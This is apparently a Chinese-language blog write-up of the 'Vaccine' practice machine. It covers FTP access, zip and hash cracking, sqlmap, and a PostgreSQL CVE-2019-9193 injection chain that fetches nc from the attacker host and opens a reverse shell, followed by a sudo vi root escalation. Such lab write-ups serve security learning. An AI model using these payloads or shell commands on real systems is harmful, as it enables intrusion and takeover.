靶机-Vaccine

信息搜集

nmap 扫了下,打开了 21,22,和 80 端口,

ftp 居然可以根据上台机器给了 ftp 密码登录,,可是我都不知道密码在哪?ftpuser/mc@F1l3ZilL4

  • 刚开始没有反应,猜测又是防火墙,果然是,,,ufw allow from 10.10.10.27 proto tcp后,才可以dir找文件,发现文件get back.zip下载

  • 解压文件unzip back.zip,发现有密码

    破解:使用 kali 的自带rockyou.txt字典破解,,shell:john hash --fork=4 -w rockyou.txt 2>/dev/null,但是没反应,,,密码741852963

    得到 web 页面的密码,md5 解码后qwerty789

    image-20211211173615149

web 漏洞

报错,存在 sql 注入,sqlmap 走一波

sqlmap 命令--dump-all爆出所有数据库所有信息
--os-shell得到 shell 权限
image-20211211173629013
不知道怎么用

其他方法

  • 所有 9.3 以上版本的 PostgreSQL 都容易受到这种任意命令执行(CVE-2019-9193)
Payload --> http://10.10.10.46/dashboard.php?search=a';DROP TABLE IF EXISTS cmd_31554; -- -
Payload --> http://10.10.10.46/dashboard.php?search=a';CREATE TABLE cmd_31554(cmd_output text); -- -
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM 'wget -P /tmp/31554 http://10.10.14.33:80/nc'; -- -#这里要注意是下载nc的意思,所以需要在主机开一个局域网,并且在nc所在的目录下。。不然会报错
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM 'chmod 777 /tmp/31554/nc'; -- -#给权限
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM '/tmp/31554/nc 10.10.16.64 4444 -e /bin/bash'; -- #具体使用nc的操作

成功反弹 shell
image-20211211173724022

在 www 目录下,得到数据库密码
image-20211211173740604

python3 -c "import pty;pty.spawn('/bin/bash')";进入更友好的 shell 界面

sudo -l查看当前用户能够使用的 root 命令

提权

编辑文件sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
输入:!/bin/sh或者:shell即可

posted @ 2021-12-11 17:41  kzd的前沿思考  阅读(27)  评论(0编辑  收藏  举报